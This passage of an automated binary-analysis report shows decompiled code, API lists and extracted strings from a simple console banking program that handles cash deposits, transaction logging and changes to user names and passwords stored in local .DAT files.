                                                                      					 *0xc02f28 = E00BE6EF1("ACCOUNT.DAT", "r");
                                                                      					_t75 = E00BE6EF1("TEMP.DAT", "a");
                                                                      					_t153 = _t151 + 0x10;
                                                                      					 *0xc02f24 = _t75;
                                                                      					while(1) {
                                                                      						_push( &_v32);
                                                                      						_push( &_v36);
                                                                      						_push( &_v40);
                                                                      						_push( &_v42);
                                                                      						_push( &_v140);
                                                                      						_push( &_v113);
                                                                      						_push( &_v62);
                                                                      						_push( &_v112);
                                                                      						_push( &_v125);
                                                                      						_push( &_v170);
                                                                      						_push( &_v200);
                                                                      						_t129 =  *0xc02f28; // 0x0
                                                                      						_t80 = E00BE7021(_t129, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                                      						_t154 = _t153 + 0x38;
                                                                      						__eflags = _t80 - 0xffffffff;
                                                                      						if(__eflags == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t93 = E00BE8230( &_v208,  &_v28);
                                                                      						_t163 = _t154 + 8;
                                                                      						__eflags = _t93;
                                                                      						if(__eflags == 0) {
                                                                      							asm("movss xmm0, [ebp-0x24]");
                                                                      							asm("addss xmm0, [ebp-0x8]");
                                                                      							asm("movss [ebp-0x24], xmm0");
                                                                      						}
                                                                      						asm("movss xmm0, [ebp-0x24]");
                                                                      						asm("addss xmm0, [ebp-0x20]");
                                                                      						asm("movss [ebp-0x1c], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						_push(_v42);
                                                                      						_push( &_v140);
                                                                      						_push(_v113);
                                                                      						_push( &_v62);
                                                                      						_push( &_v112);
                                                                      						_push( &_v125);
                                                                      						_push( &_v170);
                                                                      						_push( &_v200);
                                                                      						_push( &_v208);
                                                                      						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                                      						_t134 =  *0xc02f24; // 0x0
                                                                      						_push(_t134);
                                                                      						E00BE6F06(_t101, _t135, _t136, __eflags);
                                                                      						_t153 = _t163 - 0xfffffffffffffff8 + 0x44;
                                                                      					}
                                                                      					_t81 =  *0xc02f24; // 0x0
                                                                      					_push(_t81);
                                                                      					E00BE6DB6(_t101, _t135, _t136, __eflags);
                                                                      					_t113 =  *0xc02f28; // 0x0
                                                                      					_push(_t113);
                                                                      					E00BE6DB6(_t101, _t135, _t136, __eflags);
                                                                      					 *0xc02f28 = E00BE6EF1("TRANSACTION.DAT", "a");
                                                                      					E00BE8417(__eflags, 0xc02f30);
                                                                      					_push(0xc02ee4);
                                                                      					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                                      					asm("movsd [esp], xmm0");
                                                                      					_push(0xc02f30);
                                                                      					_push(0xc02f40);
                                                                      					_push("Cash+Deposited");
                                                                      					_push( &_v28);
                                                                      					_push("%s %s %s %s %.2f %s\n");
                                                                      					_t86 =  *0xc02f28; // 0x0
                                                                      					_push(_t86);
                                                                      					E00BE6F06(_t101, _t135, _t136, __eflags);
                                                                      					_t114 =  *0xc02f28; // 0x0
                                                                      					_push(_t114);
                                                                      					E00BE6DB6(_t101, _t135, _t136, __eflags);
                                                                      					E00BE20E0(_t114, _t135, _t136, __eflags, _t170);
                                                                      					E00BE12B0(0x14, 0xc);
                                                                      					_push("Transaction completed successfully!");
                                                                      					return E00BE715C(_t101, _t135, _t136, __eflags);
                                                                      				}
                                                                      				__eflags = _v5 - 0x79;
                                                                      				if(_v5 == 0x79) {
                                                                      					goto L4;
                                                                      				}
                                                                      				return _t73;
                                                                      			}










































                                                                      0x00be4640
                                                                      0x00be4640
                                                                      0x00be4640
                                                                      0x00be4640
                                                                      0x00be4640
                                                                      0x00be4649
                                                                      0x00be4650
                                                                      0x00be4659
                                                                      0x00be465e
                                                                      0x00be4663
                                                                      0x00be4674
                                                                      0x00be468e
                                                                      0x00be4693
                                                                      0x00be4699
                                                                      0x00be469a
                                                                      0x00be469f
                                                                      0x00be46a2
                                                                      0x00be46a6
                                                                      0x00be46a8
                                                                      0x00be46b1
                                                                      0x00be46b6
                                                                      0x00000000
                                                                      0x00be46c0
                                                                      0x00be46cc
                                                                      0x00be46d7
                                                                      0x00be46d8
                                                                      0x00be46dd
                                                                      0x00be46e9
                                                                      0x00be46ee
                                                                      0x00be46f3
                                                                      0x00be4704
                                                                      0x00be470c
                                                                      0x00be4715
                                                                      0x00be471a
                                                                      0x00be471f
                                                                      0x00be4724
                                                                      0x00be4729
                                                                      0x00be4735
                                                                      0x00be473e
                                                                      0x00be4749
                                                                      0x00be474d
                                                                      0x00be475a
                                                                      0x00be4769
                                                                      0x00be4771
                                                                      0x00be4776
                                                                      0x00be4789
                                                                      0x00be479d
                                                                      0x00be47c0
                                                                      0x00be47cb
                                                                      0x00be47cc
                                                                      0x00be47d8
                                                                      0x00be47dd
                                                                      0x00be47e2
                                                                      0x00be47e7
                                                                      0x00be47ea
                                                                      0x00be47ee
                                                                      0x00be47f1
                                                                      0x00be4800
                                                                      0x00be4812
                                                                      0x00be4821
                                                                      0x00be4826
                                                                      0x00be4829
                                                                      0x00be482e
                                                                      0x00be4831
                                                                      0x00be4835
                                                                      0x00be4839
                                                                      0x00be483d
                                                                      0x00be4844
                                                                      0x00be4848
                                                                      0x00be484c
                                                                      0x00be4850
                                                                      0x00be4854
                                                                      0x00be485b
                                                                      0x00be4862
                                                                      0x00be486f
                                                                      0x00be4876
                                                                      0x00be487b
                                                                      0x00be487e
                                                                      0x00be4881
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be4892
                                                                      0x00be4897
                                                                      0x00be489a
                                                                      0x00be489c
                                                                      0x00be489e
                                                                      0x00be48a3
                                                                      0x00be48a8
                                                                      0x00be48a8
                                                                      0x00be48ad
                                                                      0x00be48b2
                                                                      0x00be48b7
                                                                      0x00be48bc
                                                                      0x00be48c4
                                                                      0x00be48c9
                                                                      0x00be48d1
                                                                      0x00be48d6
                                                                      0x00be48de
                                                                      0x00be48e7
                                                                      0x00be48ee
                                                                      0x00be48f3
                                                                      0x00be48f7
                                                                      0x00be48fb
                                                                      0x00be48ff
                                                                      0x00be4906
                                                                      0x00be490d
                                                                      0x00be4914
                                                                      0x00be4915
                                                                      0x00be491a
                                                                      0x00be4920
                                                                      0x00be4921
                                                                      0x00be4926
                                                                      0x00be4926
                                                                      0x00be492e
                                                                      0x00be4933
                                                                      0x00be4934
                                                                      0x00be493c
                                                                      0x00be4942
                                                                      0x00be4943
                                                                      0x00be495d
                                                                      0x00be4967
                                                                      0x00be496f
                                                                      0x00be4974
                                                                      0x00be497c
                                                                      0x00be4981
                                                                      0x00be4986
                                                                      0x00be498b
                                                                      0x00be4993
                                                                      0x00be4994
                                                                      0x00be4999
                                                                      0x00be499e
                                                                      0x00be499f
                                                                      0x00be49a7
                                                                      0x00be49ad
                                                                      0x00be49ae
                                                                      0x00be49b6
                                                                      0x00be49bf
                                                                      0x00be49c4
                                                                      0x00000000
                                                                      0x00be49ce
                                                                      0x00be47f7
                                                                      0x00be47fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be49d4

                                                                      APIs
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE4663
                                                                      • _wscanf.LIBCMT ref: 00BE4674
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _wprintf.LIBCMT ref: 00BE46BB
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wprintf.LIBCMT ref: 00BE46DD
                                                                      • _wprintf.LIBCMT ref: 00BE46F3
                                                                      • _wscanf.LIBCMT ref: 00BE4704
                                                                      • _wprintf.LIBCMT ref: 00BE471F
                                                                      • _wprintf.LIBCMT ref: 00BE475A
                                                                      • _wprintf.LIBCMT ref: 00BE47E2
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2152
                                                                      Strings
                                                                      • Cash+Deposited, xrefs: 00BE498B
                                                                      • Transaction completed successfully!, xrefs: 00BE49C4
                                                                      • TEMP.DAT, xrefs: 00BE481C
                                                                      • ACCOUNT.DAT, xrefs: 00BE4681
                                                                      • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00BE486A
                                                                      • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00BE4915
                                                                      • Deposit to A/C number : , xrefs: 00BE465E
                                                                      • Confirm Transaction, xrefs: 00BE471A
                                                                      • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 00BE47DD
                                                                      • %s %s %s %s %.2f %s, xrefs: 00BE4994
                                                                      • [ %s ], xrefs: 00BE46D8
                                                                      • %s to be deposited in A/C number : %s [ %s ], xrefs: 00BE4755
                                                                      • TRANSACTION.DAT, xrefs: 00BE4950
                                                                      • Amount to be Deposited (in NRs.) : , xrefs: 00BE46EE
                                                                      • ACCOUNT.DAT, xrefs: 00BE4805
                                                                      • Given A/C number does not exits!, xrefs: 00BE46B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vwscanf
                                                                      • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]
                                                                      • API String ID: 532294799-930819241
                                                                      • Opcode ID: 97849645ca55ea26cc1361987be7f185d4f729bde38534040ef8921564494f9b
                                                                      • Instruction ID: 91b9e05aa28301d3b6062b5bd39797219f6aa61fd994a3d3f60cd6d89fdea249
                                                                      • Opcode Fuzzy Hash: 97849645ca55ea26cc1361987be7f185d4f729bde38534040ef8921564494f9b
                                                                      • Instruction Fuzzy Hash: F691B1B2D503496BDB11EBE58C43FDE73B89B19740F0182A9F605750C2FB706648CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00BE2B10(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                      				char _v5;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				char _v19;
                                                                      				char _v23;
                                                                      				char _v27;
                                                                      				char _v31;
                                                                      				char _v35;
                                                                      				char _v39;
                                                                      				char _v43;
                                                                      				char _v47;
                                                                      				char _v48;
                                                                      				char _v51;
                                                                      				char _v55;
                                                                      				char _v59;
                                                                      				char _v63;
                                                                      				char _v67;
                                                                      				char _v71;
                                                                      				char _v75;
                                                                      				char _v79;
                                                                      				char _v80;
                                                                      				char _v83;
                                                                      				char _v87;
                                                                      				char _v91;
                                                                      				char _v95;
                                                                      				char _v99;
                                                                      				char _v103;
                                                                      				char _v107;
                                                                      				char _v111;
                                                                      				char _v112;
                                                                      				char _v144;
                                                                      				char _v176;
                                                                      				char _v208;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t66;
                                                                      				intOrPtr _t67;
                                                                      				void* _t68;
                                                                      				intOrPtr _t84;
                                                                      				intOrPtr _t86;
                                                                      				intOrPtr _t87;
                                                                      				void* _t88;
                                                                      				intOrPtr _t89;
                                                                      				intOrPtr _t95;
                                                                      				intOrPtr _t98;
                                                                      				intOrPtr _t105;
                                                                      				char _t106;
                                                                      				void* _t109;
                                                                      				void* _t110;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t130;
                                                                      				intOrPtr _t132;
                                                                      				void* _t136;
                                                                      				void* _t140;
                                                                      				void* _t141;
                                                                      				void* _t142;
                                                                      				void* _t143;
                                                                      				void* _t149;
                                                                      				void* _t150;
                                                                      				void* _t154;
                                                                      
                                                                      				_t161 = __fp0;
                                                                      				_t135 = __esi;
                                                                      				_t134 = __edi;
                                                                      				_t113 = __ebx;
                                                                      				_v48 = 0;
                                                                      				_v47 = 0;
                                                                      				_v43 = 0;
                                                                      				_v39 = 0;
                                                                      				_v35 = 0;
                                                                      				_v31 = 0;
                                                                      				_v27 = 0;
                                                                      				_v23 = 0;
                                                                      				_v19 = 0;
                                                                      				_v112 = 0;
                                                                      				_v111 = 0;
                                                                      				_v107 = 0;
                                                                      				_v103 = 0;
                                                                      				_v99 = 0;
                                                                      				_v95 = 0;
                                                                      				_v91 = 0;
                                                                      				_v87 = 0;
                                                                      				_v83 = 0;
                                                                      				_v80 = 0;
                                                                      				_v79 = 0;
                                                                      				_v75 = 0;
                                                                      				_v71 = 0;
                                                                      				_v67 = 0;
                                                                      				_v63 = 0;
                                                                      				_v59 = 0;
                                                                      				_v55 = 0;
                                                                      				_v51 = 0;
                                                                      				_v16 = 0;
                                                                      				_v12 = 0;
                                                                      				E00BE20E0(0, __edi, __esi, 0, __fp0);
                                                                      				E00BE12B0(0x19, 8);
                                                                      				_push("User Name  : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, 0);
                                                                      				E00BE738B("%s", 0xc02ee4);
                                                                      				E00BE12B0(0x19, 0xa);
                                                                      				_push("Password  : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, 0);
                                                                      				E00BE12F0(_t134, _t135,  &_v112);
                                                                      				_t66 = E00BE6EF1("USER.DAT", "r");
                                                                      				_t140 = _t136 + 0x18;
                                                                      				 *0xc02f28 = _t66;
                                                                      				while(1) {
                                                                      					_push( &_v144);
                                                                      					_push( &_v176);
                                                                      					_t67 =  *0xc02f28; // 0x0
                                                                      					_t68 = E00BE7021(_t67, "%s %s %s\n", 0xc02ee0);
                                                                      					_t141 = _t140 + 0x14;
                                                                      					if(_t68 == 0xffffffff) {
                                                                      						break;
                                                                      					}
                                                                      					_t109 = E00BE8230(0xc02ee4,  &_v176);
                                                                      					_t140 = _t141 + 8;
                                                                      					if(_t109 == 0) {
                                                                      						_t110 = E00BE8230(0xc02f02,  &_v144);
                                                                      						_t140 = _t140 + 8;
                                                                      						if(_t110 == 0) {
                                                                      							_v16 = _v16 + 1;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t116 =  *0xc02f28; // 0x0
                                                                      				_push(_t116);
                                                                      				E00BE6DB6(_t113, _t134, _t135, __eflags);
                                                                      				_t142 = _t141 + 4;
                                                                      				E00BE20E0(_t116, _t134, _t135, __eflags, _t161);
                                                                      				__eflags = _v16;
                                                                      				if(__eflags != 0) {
                                                                      					E00BE12B0(8, 0xa);
                                                                      					_push("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
                                                                      					E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      					_t143 = _t142 + 4;
                                                                      					__eflags = _v5 - 0x59;
                                                                      					if(__eflags == 0) {
                                                                      						do {
                                                                      							L10:
                                                                      							E00BE20E0(_t116, _t134, _t135, __eflags, _t161);
                                                                      							_v12 = 0;
                                                                      							E00BE12B0(0x19, 8);
                                                                      							_push("NEW User Name        : ");
                                                                      							E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      							E00BE738B("%s",  &_v208);
                                                                      							E00BE12B0(0x19, 0xa);
                                                                      							_push("NEW Password         : ");
                                                                      							E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      							E00BE12F0(_t134, _t135,  &_v48);
                                                                      							E00BE12B0(0x19, 0xc);
                                                                      							_push("Confirm NEW Password : ");
                                                                      							E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      							E00BE12F0(_t134, _t135,  &_v80);
                                                                      							_t116 =  &_v80;
                                                                      							_t84 = E00BE8230( &_v48,  &_v80);
                                                                      							_t143 = _t143 + 0x1c;
                                                                      							__eflags = _t84;
                                                                      							if(__eflags != 0) {
                                                                      								E00BE20E0( &_v80, _t134, _t135, __eflags, _t161);
                                                                      								E00BE12B0(0xa, 0xa);
                                                                      								_push(0xbff710);
                                                                      								E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      								_t143 = _t143 + 4;
                                                                      								_t105 = _v12 + 1;
                                                                      								__eflags = _t105;
                                                                      								_v12 = _t105;
                                                                      							}
                                                                      							__eflags = _v12;
                                                                      						} while (__eflags != 0);
                                                                      						 *0xc02f28 = E00BE6EF1("USER.DAT", 0xbff740);
                                                                      						_t86 = E00BE6EF1("temp.dat", "a");
                                                                      						_t149 = _t143 + 0x10;
                                                                      						 *0xc02f20 = _t86;
                                                                      						while(1) {
                                                                      							_push( &_v144);
                                                                      							_push( &_v176);
                                                                      							_t87 =  *0xc02f28; // 0x0
                                                                      							_t88 = E00BE7021(_t87, "%s %s %s\n", 0xc02ee0);
                                                                      							_t150 = _t149 + 0x14;
                                                                      							__eflags = _t88 - 0xffffffff;
                                                                      							if(__eflags == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t95 = E00BE8230(0xc02ee4,  &_v176);
                                                                      							_t154 = _t150 + 8;
                                                                      							__eflags = _t95;
                                                                      							if(__eflags != 0) {
                                                                      								L17:
                                                                      								_push( &_v144);
                                                                      								_push( &_v176);
                                                                      								_push(0xc02ee0);
                                                                      								_push("%s %s %s\n");
                                                                      								_t130 =  *0xc02f20; // 0x0
                                                                      								_push(_t130);
                                                                      								E00BE6F06(_t113, _t134, _t135, __eflags);
                                                                      								_t149 = _t154 + 0x14;
                                                                      								L19:
                                                                      								continue;
                                                                      							}
                                                                      							_t98 = E00BE8230(0xc02f02,  &_v144);
                                                                      							_t154 = _t154 + 8;
                                                                      							__eflags = _t98;
                                                                      							if(__eflags == 0) {
                                                                      								_push( &_v48);
                                                                      								_push( &_v208);
                                                                      								_push(0xc02ee0);
                                                                      								_push("%s %s %s\n");
                                                                      								_t132 =  *0xc02f20; // 0x0
                                                                      								_push(_t132);
                                                                      								E00BE6F06(_t113, _t134, _t135, __eflags);
                                                                      								_t149 = _t154 + 0x14;
                                                                      								goto L19;
                                                                      							}
                                                                      							goto L17;
                                                                      						}
                                                                      						_t89 =  *0xc02f28; // 0x0
                                                                      						_push(_t89);
                                                                      						E00BE6DB6(_t113, _t134, _t135, __eflags);
                                                                      						_t119 =  *0xc02f20; // 0x0
                                                                      						_push(_t119);
                                                                      						E00BE6DB6(_t113, _t134, _t135, __eflags);
                                                                      						E00BE20E0(_t119, _t134, _t135, __eflags, _t161);
                                                                      						E00BE12B0(0x19, 0xa);
                                                                      						_push("Record has been EDITED successfully!");
                                                                      						return E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      					}
                                                                      					_t106 = _v5;
                                                                      					__eflags = _t106 - 0x79;
                                                                      					if(__eflags != 0) {
                                                                      						return _t106;
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      				E00BE12B0(0xa, 0xa);
                                                                      				_push(0xbff640);
                                                                      				return E00BE715C(_t113, _t134, _t135, __eflags);
                                                                      			}






























































                                                                      0x00be2b10
                                                                      0x00be2b10
                                                                      0x00be2b10
                                                                      0x00be2b10
                                                                      0x00be2b19
                                                                      0x00be2b1f
                                                                      0x00be2b22
                                                                      0x00be2b25
                                                                      0x00be2b28
                                                                      0x00be2b2b
                                                                      0x00be2b2e
                                                                      0x00be2b31
                                                                      0x00be2b34
                                                                      0x00be2b37
                                                                      0x00be2b3d
                                                                      0x00be2b40
                                                                      0x00be2b43
                                                                      0x00be2b46
                                                                      0x00be2b49
                                                                      0x00be2b4c
                                                                      0x00be2b4f
                                                                      0x00be2b52
                                                                      0x00be2b55
                                                                      0x00be2b5b
                                                                      0x00be2b5e
                                                                      0x00be2b61
                                                                      0x00be2b64
                                                                      0x00be2b67
                                                                      0x00be2b6a
                                                                      0x00be2b6d
                                                                      0x00be2b70
                                                                      0x00be2b73
                                                                      0x00be2b7a
                                                                      0x00be2b81
                                                                      0x00be2b8a
                                                                      0x00be2b8f
                                                                      0x00be2b94
                                                                      0x00be2ba6
                                                                      0x00be2bb2
                                                                      0x00be2bb7
                                                                      0x00be2bbc
                                                                      0x00be2bc8
                                                                      0x00be2bd7
                                                                      0x00be2bdc
                                                                      0x00be2bdf
                                                                      0x00be2be4
                                                                      0x00be2bea
                                                                      0x00be2bf1
                                                                      0x00be2bfc
                                                                      0x00be2c02
                                                                      0x00be2c07
                                                                      0x00be2c0d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2c1b
                                                                      0x00be2c20
                                                                      0x00be2c25
                                                                      0x00be2c33
                                                                      0x00be2c38
                                                                      0x00be2c3d
                                                                      0x00be2c45
                                                                      0x00be2c45
                                                                      0x00be2c3d
                                                                      0x00be2c48
                                                                      0x00be2c4a
                                                                      0x00be2c50
                                                                      0x00be2c51
                                                                      0x00be2c56
                                                                      0x00be2c59
                                                                      0x00be2c5e
                                                                      0x00be2c62
                                                                      0x00be2c83
                                                                      0x00be2c88
                                                                      0x00be2c8d
                                                                      0x00be2c92
                                                                      0x00be2c99
                                                                      0x00be2c9c
                                                                      0x00be2cab
                                                                      0x00be2cab
                                                                      0x00be2cab
                                                                      0x00be2cb0
                                                                      0x00be2cbb
                                                                      0x00be2cc0
                                                                      0x00be2cc5
                                                                      0x00be2cd9
                                                                      0x00be2ce5
                                                                      0x00be2cea
                                                                      0x00be2cef
                                                                      0x00be2cfb
                                                                      0x00be2d04
                                                                      0x00be2d09
                                                                      0x00be2d0e
                                                                      0x00be2d1a
                                                                      0x00be2d1f
                                                                      0x00be2d27
                                                                      0x00be2d2c
                                                                      0x00be2d2f
                                                                      0x00be2d31
                                                                      0x00be2d33
                                                                      0x00be2d3c
                                                                      0x00be2d41
                                                                      0x00be2d46
                                                                      0x00be2d4b
                                                                      0x00be2d51
                                                                      0x00be2d51
                                                                      0x00be2d54
                                                                      0x00be2d54
                                                                      0x00be2d57
                                                                      0x00be2d57
                                                                      0x00be2d73
                                                                      0x00be2d82
                                                                      0x00be2d87
                                                                      0x00be2d8a
                                                                      0x00be2d8f
                                                                      0x00be2d95
                                                                      0x00be2d9c
                                                                      0x00be2da7
                                                                      0x00be2dad
                                                                      0x00be2db2
                                                                      0x00be2db5
                                                                      0x00be2db8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be2dca
                                                                      0x00be2dcf
                                                                      0x00be2dd2
                                                                      0x00be2dd4
                                                                      0x00be2dee
                                                                      0x00be2df4
                                                                      0x00be2dfb
                                                                      0x00be2dfc
                                                                      0x00be2e01
                                                                      0x00be2e06
                                                                      0x00be2e0c
                                                                      0x00be2e0d
                                                                      0x00be2e12
                                                                      0x00be2e3b
                                                                      0x00000000
                                                                      0x00be2e3b
                                                                      0x00be2de2
                                                                      0x00be2de7
                                                                      0x00be2dea
                                                                      0x00be2dec
                                                                      0x00be2e1a
                                                                      0x00be2e21
                                                                      0x00be2e22
                                                                      0x00be2e27
                                                                      0x00be2e2c
                                                                      0x00be2e32
                                                                      0x00be2e33
                                                                      0x00be2e38
                                                                      0x00000000
                                                                      0x00be2e38
                                                                      0x00000000
                                                                      0x00be2dec
                                                                      0x00be2e40
                                                                      0x00be2e45
                                                                      0x00be2e46
                                                                      0x00be2e4e
                                                                      0x00be2e54
                                                                      0x00be2e55
                                                                      0x00be2e5d
                                                                      0x00be2e66
                                                                      0x00be2e6b
                                                                      0x00000000
                                                                      0x00be2e75
                                                                      0x00be2c9e
                                                                      0x00be2ca2
                                                                      0x00be2ca5
                                                                      0x00be2e7b
                                                                      0x00be2e7b
                                                                      0x00000000
                                                                      0x00be2ca5
                                                                      0x00be2c68
                                                                      0x00be2c6d
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE2B94
                                                                      • _wscanf.LIBCMT ref: 00BE2BA6
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                      • _wprintf.LIBCMT ref: 00BE2BBC
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                        • Part of subcall function 00BE12F0: _wprintf.LIBCMT ref: 00BE1329
                                                                        • Part of subcall function 00BE6EF1: __fsopen.LIBCMT ref: 00BE6EFC
                                                                      • _swscanf.LIBCMT ref: 00BE2C02
                                                                        • Part of subcall function 00BE7021: _vfscanf.LIBCMT ref: 00BE7035
                                                                      • _wprintf.LIBCMT ref: 00BE2C72
                                                                      • _wprintf.LIBCMT ref: 00BE2C8D
                                                                      • _wprintf.LIBCMT ref: 00BE2CC5
                                                                      • _wscanf.LIBCMT ref: 00BE2CD9
                                                                      • _wprintf.LIBCMT ref: 00BE2CEF
                                                                      • _wprintf.LIBCMT ref: 00BE2D0E
                                                                      • _wprintf.LIBCMT ref: 00BE2D46
                                                                      • _swscanf.LIBCMT ref: 00BE2DAD
                                                                      • _fprintf.LIBCMT ref: 00BE2E0D
                                                                      • _fprintf.LIBCMT ref: 00BE2E33
                                                                      • _wprintf.LIBCMT ref: 00BE2E70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$__wstrtime_fprintf_swscanf_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_vfscanf_vwscanf
                                                                      • String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
                                                                      • API String ID: 1431756120-371646773
                                                                      • Opcode ID: 6710856b9ced7fb1653fca1d469c9d70089d410f2b9782101af5b90051272bdb
                                                                      • Instruction ID: 4c9e346449eaf39f9942d2fcf5562a4f9f16a30175766a4650e8ccb298ad6658
                                                                      • Opcode Fuzzy Hash: 6710856b9ced7fb1653fca1d469c9d70089d410f2b9782101af5b90051272bdb
                                                                      • Instruction Fuzzy Hash: A5818FB1D40389AAEB14EBA5DC43BAD77F4AF15740F0080B9F605B62D1EBB05608CB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00BE2800(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
                                                                      				char _v5;
                                                                      				intOrPtr _v12;
                                                                      				char _v20;
                                                                      				char _v23;
                                                                      				char _v27;
                                                                      				char _v31;
                                                                      				char _v35;
                                                                      				char _v39;
                                                                      				char _v43;
                                                                      				char _v47;
